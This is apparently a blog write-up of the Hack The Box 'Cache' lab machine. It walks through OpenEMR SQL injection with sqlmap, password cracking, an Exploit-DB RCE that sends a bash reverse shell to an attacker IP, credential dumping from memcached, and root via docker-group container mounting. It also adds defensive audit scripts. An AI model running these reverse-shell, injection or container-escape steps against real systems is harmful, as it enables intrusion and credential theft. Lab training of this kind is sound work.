HackThebox Cache writeup

Introduction

Cache is a medium-difficulty machine from Hack The Box.

It involves directory enumeration followed by finding a second site. OpenEMR is then exploited, credentials are recovered from Memcached, and the box is finished with a simple privilege escalation via Docker.

Lessons learned

1-Directory enumeration
2-SQL injection
3-Memcached
4-Docker exploits

Steps involved

1-Port scan
2-Website enumeration
3-Directory enumeration
4-Finding the new project
5-Exploiting OpenEMR
6-Exploiting memcached
7-Privilege escalation via Docker

Commands involved

1-nmap -sC -sV -O -v -oV 10.10.10.188
2-nano /etc/hosts
3-curl --cookie gimmepid.cookies http://localhost:8666/portal/add_edit_event_user.php\?eid\=\'
4-curl -v --cookie gimmepid.cookies http://localhost:8666/portal/add_edit_event_user.php\?eid\=1 2>&1 | grep "^>"
5-sqlmap -r request --threads=10 --tables
6-sqlmap -r request --threads=10 -D openemr -T users_secure --dump
7-john -w=/root/Desktop/rockyou.txt hash.txt
8-python shell.py http://hms.htb -u openemr_admin -p xxxxxx -c 'bash -i >& /dev/tcp/10.10.14.173/1122 0>&1'
9-python3 -c 'import pty; pty.spawn("/bin/sh")'
10-bash -i
11-su ash
12-netstat -ano
13-telnet 127.0.0.1 11211
14-stats cachedump 1 0
15-get passwd
16-ssh [email protected]
17-id
18-docker images
19-docker run -v /:/mnt -it ubuntu

Port Scan

Nmap 7.70 scan initiated Sun May 10 06:34:37 2020 as: nmap -sC -sV -O -v -oV 10.10.10.188
Increasing send delay for 10.10.10.188 from 0 to 5 due to 265 out of 881 dropped probes since last increase.
Nmap scan report for 10.10.10.188
Host is up (0.29s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 a9:2d:b2:a0:c4:57:e7:7c:35:2d:45:4d:db:80:8c:f1 (RSA)
| 256 bc:e4:16:3d:2a:59:a1:3a:6a:09:28:dd:36:10:38:08 (ECDSA)
|_ 256 57:d5:47:ee:07:ca:3a:c0:fd:9b:a8:7f:6b:4c:9d:7c (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
| http-methods:
|_ Supported Methods: OPTIONS HEAD GET POST
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Cache
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.70%E=4%D=5/10%OT=22%CT=1%CU=35467%PV=Y%DS=2%DC=I%G=Y%TM=5EB7D90
OS:8%P=x86_64-pc-linux-gnu)SEQ(SP=108%GCD=1%ISR=10A%TI=Z%CI=Z%II=I%TS=A)OPS
OS:(O1=M54DST11NW7%O2=M54DST11NW7%O3=M54DNNT11NW7%O4=M54DST11NW7%O5=M54DST1
OS:1NW7%O6=M54DST11)WIN(W1=FE88%W2=FE88%W3=FE88%W4=FE88%W5=FE88%W6=FE88)ECN
OS:(R=Y%DF=Y%T=40%W=FAF0%O=M54DNNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=A
OS:S%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R
OS:=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F
OS:=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%
OS:T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD
OS:=S)
Uptime guess: 25.559 days (since Tue Apr 14 17:10:48 2020)
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=264 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done at Sun May 10 06:35:52 2020 -- 1 IP address (1 host up) scanned in 76.53 seconds

Website enumeration

As usual, the first step is to look at the website.

The website has some pages like Home, News, Contact Us, Author and a login page.

Directory Enumeration

Meanwhile, let's run a directory enumeration tool.

Looking through the directories, I found some credentials for ash in /jquery.

So now we have credentials for ash and we have a login page, so let's log in.

ash:H@v3_fun
But this seems to be useless, so I moved on.

Finding new project

The author page gives us a hint about ash's new project.

It was a little guessing game here.

Taking the hint from author.html, I added hms.htb to my hosts file and it worked.

nano /etc/hosts

So now we have OpenEMR, and there is a login page here.

Exploiting OpenEMR

After a little enumeration I found many directories and files, but admin.php was useful as it showed the version of OpenEMR.

I searched on Google, but the exploits were authenticated, so I needed to get credentials first.

With the help of the HTB Discord community I came across a link that helped me get the credentials of an OpenEMR user.

https://atha.io/post/2019/08/how-i-got-2nd-place-in-my-first-ctf-ever/

It was a SQL injection in OpenEMR, so I followed it.

curl --cookie gimmepid.cookies http://localhost:8666/portal/add_edit_event_user.php\?eid\=\'
For more explanation, visit the link above.

Let's now capture the request and use it with sqlmap.

curl -v --cookie gimmepid.cookies http://localhost:8666/portal/add_edit_event_user.php\?eid\=1 2>&1 | grep "^>"
Now I just copied the GET request to use it with sqlmap.

root@nagendra:~/Desktop/htb/cache# sqlmap -r request --threads=10 --tables

Table users_secure looks interesting.

So let's dump it and see what is inside.

root@nagendra:~/Desktop/htb/cache# sqlmap -r request --threads=10 -D openemr -T users_secure --dump
So now we have the hashes; let's crack them using John the Ripper.

I had already cracked it earlier, which is why it does not crack again now.

openemr_admin:xxxxxx
These are the credentials for OpenEMR. We know that there are exploits for it, and now that we have credentials we can use those (authenticated) exploits.

Here is the link to the exploit I used.

https://www.exploit-db.com/exploits/45161
python shell.py http://hms.htb -u openemr_admin -p xxxxxx -c 'bash -i >& /dev/tcp/10.10.14.173/1122 0>&1'
And now we have a shell as www-data.

After a little enumeration I found that there are two users, ash and luffy.

Moreover, we have the credentials for ash, so let's switch to the ash user.

In ash's home directory we found the user flag.

Exploiting memcached

So I started enumerating and saw that a strange port was listening locally: 127.0.0.1:11211.

So let's google that port.

https://www.hackingarticles.in/penetration-testing-on-memcached-server/

So let's connect to the memcached service on port 11211 through telnet.

Let's list the items.

Now we know the items are in slab 1, so we dumped that slab (stats cachedump 1 0).
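The telnet session above (stats items, then stats cachedump per slab) reproduced as a small audit script, so a defender can quickly see which keys an unauthenticated memcached instance exposes. This is an added example, not code from the original post; the host, port and the sample responses are constructed assumptions.

```python
"""List the keys an unauthenticated memcached instance will hand out.

Mirrors the manual telnet steps from the writeup: "stats items" gives the
slab ids, "stats cachedump <slab> <limit>" lists the keys in each slab.
Sample responses below are constructed for offline testing, not captured.
"""
import re
import socket

# Constructed sample of a "stats items" response (not from the box).
SAMPLE_STATS_ITEMS = (
    "STAT items:1:number 5\r\n"
    "STAT items:1:age 120\r\n"
    "STAT items:3:number 2\r\n"
    "END\r\n"
)
# Constructed sample of a "stats cachedump 1 0" response.
SAMPLE_CACHEDUMP = (
    "ITEM passwd [9 b; 1589116797 s]\r\n"
    "ITEM user [6 b; 1589116797 s]\r\n"
    "END\r\n"
)

def parse_slabs(text):
    """Return {slab_id: item_count} from a 'stats items' response."""
    return {int(m.group(1)): int(m.group(2))
            for m in re.finditer(r"STAT items:(\d+):number (\d+)", text)}

def parse_cachedump(text):
    """Return [(key, size_in_bytes)] from a 'stats cachedump' response."""
    return [(m.group(1), int(m.group(2)))
            for m in re.finditer(r"^ITEM (\S+) \[(\d+) b;", text, re.M)]

def _query(sock, command):
    """Send one command and read until the END terminator."""
    sock.sendall(command.encode() + b"\r\n")
    buf = b""
    while not buf.endswith(b"END\r\n"):
        chunk = sock.recv(4096)
        if not chunk:
            break
        buf += chunk
    return buf.decode(errors="replace")

def list_keys(host="127.0.0.1", port=11211, timeout=3.0):
    """Return {slab_id: [key, ...]} for every slab the server reports."""
    keys = {}
    with socket.create_connection((host, port), timeout=timeout) as sock:
        for slab, count in parse_slabs(_query(sock, "stats items")).items():
            dump = _query(sock, f"stats cachedump {slab} {count}")
            keys[slab] = [k for k, _ in parse_cachedump(dump)]
    return keys

if __name__ == "__main__":
    for slab, names in list_keys().items():
        print(f"slab {slab}: {names}")
```

Keys named like passwd or user in such a dump are the signal that secrets are being cached in plaintext on a service with no authentication, which is the misconfiguration this box turns on.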

Now we have the credentials for the luffy user, so let's use them to log in via SSH.

luffy:0n3_p1ec3

Privilege escalation via Docker

After logging in as luffy, checking the id revealed that luffy is a member of the docker group, which can be the path to root.

So I searched on Google and found an article.

https://www.hackingarticles.in/docker-privilege-escalation/

To run a Docker container, first we need to see which images are available.

And we simply ran a Docker container with the host's / bind-mounted at /mnt inside it.

So now we can read the root flag and also the root hash.
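The docker-group finding above, turned into a check an administrator can run: it lists the members of the docker group and confirms whether the daemon socket is group-writable, the combination that makes membership root-equivalent. This is an added example, not from the original post; the /etc/group excerpt is constructed and the socket path is the usual default, assumed here.

```python
"""Audit who holds root-equivalent access through the docker group.

Any member of the docker group can start a container with the host's
root filesystem bind-mounted (the writeup's `docker run -v /:/mnt -it ubuntu`),
so the group deserves the same scrutiny as sudo. The /etc/group excerpt
below is constructed for offline testing; `luffy` mirrors the writeup.
"""
import os
import stat

# Constructed /etc/group excerpt (not captured from the box).
SAMPLE_GROUP = (
    "root:x:0:\n"
    "sudo:x:27:ash\n"
    "docker:x:999:luffy\n"
    "ash:x:1000:\n"
)

def docker_group(group_text, name="docker"):
    """Return (gid, [members]) for `name` from /etc/group text, or (None, [])."""
    for line in group_text.splitlines():
        fields = line.split(":")
        if len(fields) == 4 and fields[0] == name:
            return int(fields[2]), [u for u in fields[3].split(",") if u]
    return None, []

def socket_exposed(mode, sock_gid, docker_gid):
    """True when the daemon socket is writable by the docker group, the
    default layout that turns group membership into root on the host."""
    return sock_gid == docker_gid and bool(mode & stat.S_IWGRP)

def audit(group_path="/etc/group", sock_path="/var/run/docker.sock"):
    """Return the users who can drive the Docker daemon through its socket."""
    with open(group_path) as fh:
        gid, members = docker_group(fh.read())
    if gid is None or not os.path.exists(sock_path):
        return []
    st = os.stat(sock_path)  # assumed default socket path
    return members if socket_exposed(st.st_mode, st.st_gid, gid) else []

if __name__ == "__main__":
    for user in audit():
        print(f"{user}: docker group member with socket access (root-equivalent)")
```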


2 Comments

  1. Ankush

    Osm write-up bhai👌👌🤟🤟
